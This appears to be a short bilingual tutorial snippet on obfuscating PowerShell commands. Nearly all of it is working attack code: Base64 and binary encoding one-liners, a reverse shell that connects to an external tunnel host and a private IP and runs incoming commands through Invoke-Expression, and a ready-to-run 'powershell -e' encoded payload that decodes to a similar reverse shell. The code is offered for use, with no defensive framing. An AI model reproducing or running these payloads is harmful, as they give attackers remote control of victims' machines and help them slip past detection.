Aprende a ofuscar tus comandos con PowerShell nativo // Learn to obfuscate your commands with native PowerShell
$command = '' $bytes = [System.Text.Encoding]::Unicode.GetBytes($command) $encodedCommand = [Convert]::ToBase64String($bytes) $encodedCommand
$command = '' $bytes = [System.Text.Encoding]::Unicode.GetBytes($command) $encodedCommand = -join ($bytes | ForEach-Object { [Convert]::ToString($_, 2).PadLeft(8, '0') }) $encodedCommand
$command = '$a = New-Object System.Net.Sockets.TcpClient("kodah-26206.portmap.host", 26206); $b = $a.GetStream(); while ($true) { $c = New-Object -TypeName System.Byte[] 4096; $b.Read($c, 0, $c.Length) | Out-Null; $d = [System.Text.Encoding]::ASCII.GetString($c).Trim(); if ($d -eq "exit") { break } $e = Invoke-Expression $d 2>&1 | Out-String; $b.Write([System.Text.Encoding]::ASCII.GetBytes($e + "fsociety@kraken$: "), 0, ($e + "fsociety@kraken$: ").Length) }$a = New-Object System.Net.Sockets.TcpClient("192.168.232.130", 9001); $b = $a.GetStream(); while ($true) { $c = New-Object -TypeName System.Byte[] 4096; $b.Read($c, 0, $c.Length) | Out-Null; $d = [System.Text.Encoding]::ASCII.GetString($c).Trim(); if ($d -eq "exit") { break } $e = Invoke-Expression $d 2>&1 | Out-String; $b.Write([System.Text.Encoding]::ASCII.GetBytes($e + "fsociety@kraken$: "), 0, ($e + "fsociety@kraken$: ").Length) }'
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encodedCommand = [Convert]::ToBase64String($bytes)
$encodedCommand
powershell -e JAB4ADAAMAAwADMAIAA9ACAAIgAxADkAMgAuADEANgA4AC4AMgAzADIALgAxADMAMAAiADsAIAAkAHgAMAAwADAAMgAgAD0AIAA5ADAAMAAxADsAIAAkAHgAMAAwADAAMQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBTAG8AYwBrAGUAdABzAC4AVABDAFAAQwBsAGkAZQBuAHQAKAAkAHgAMAAwADAAMwAsACAAJAB4ADAAMAAwADIAKQA7ACAAJABOAGUAdAB3AG8AcgBrAFMAdAByAGUAYQBtACAAPQAgACQAeAAwADAAMAAxAC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAIAAkAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoACQATgBlAHQAdwBvAHIAawBTAHQAcgBlAGEAbQApADsAIAAkAFMAdAByAGUAYQBtAFcAcgBpAHQAZQByACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBXAHIAaQB0AGUAcgAoACQATgBlAHQAdwBvAHIAawBTAHQAcgBlAGEAbQApADsAIAAkAFMAdAByAGUAYQBtAFcAcgBpAHQAZQByAC4AQQB1AHQAbwBGAGwAdQBzAGgAIAA9ACAAJAB0AHIAdQBlADsAIAAkAEIAdQBmAGYAZQByACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEIAeQB0AGUAWwBdACAAMQAwADIANAA7ACAAdwBoAGkAbABlACAAKAAkAHgAMAAwADAAMQAuAEMAbwBuAG4AZQBjAHQAZQBkACkAIAB7ACAAdwBoAGkAbABlACAAKAAkAE4AZQB0AHcAbwByAGsAUwB0AHIAZQBhAG0ALgBEAGEAdABhAEEAdgBhAGkAbABhAGIAbABlACkAIAB7ACAAJABSAGEAdwBEAGEAdABhACAAPQAgACQATgBlAHQAdwBvAHIAawBTAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAEIAdQBmAGYAZQByACwAIAAwACwAIAAkAEIAdQBmAGYAZQByAC4ATABlAG4AZwB0AGgAKQA7ACAAJABDAG8AZABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABCAHUAZgBmAGUAcgAsACAAMAAsACAAJABSAGEAdwBEAGEAdABhACAALQAxACkAIAB9ADsAIABpAGYAIAAoACQAeAAwADAAMAAxAC4AQwBvAG4AbgBlAGMAdABlAGQAIAAtAGEAbgBkACAAJABDAG8AZABlAC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADEAKQAgAHsAIAAkAHgAMAAwADAAMAAgAD0AIAB0AHIAeQAgAHsAIABJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAoACQAQwBvAGQAZQApACAAMgA+ACYAMQAgAH0AIABjAGEAdABjAGgAIAB7ACAAJABfACAAfQA7ACAAJABTAHQAcgBlAGEAbQBXAHIAaQB0AGUAcgAuAFcAcgBpAHQAZQAoACIAJAB4ADAAMAAwADAAYABuACIAKQA7ACAAJABDAG8AZABlACAAPQAgACQAbgB1AGwAbAAgAH0AIAB9ADsAIAAkAHgAMAAwADAAMQAuAEMAbABvAHMAZQAoACkAOwAgACQATgBlAHQAdwBvAHIAawBTAHQAcgBlAGEAbQAuAEMAbABvAHMAZQAoACkAOwAgACQAUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIALgBDAGwAbwBzAGUAKAApADsAIAAkAFMAdAByAGUAYQBtAFcAcgBpAHQAZQByAC4AQwBsAG8AcwBlACgAKQA=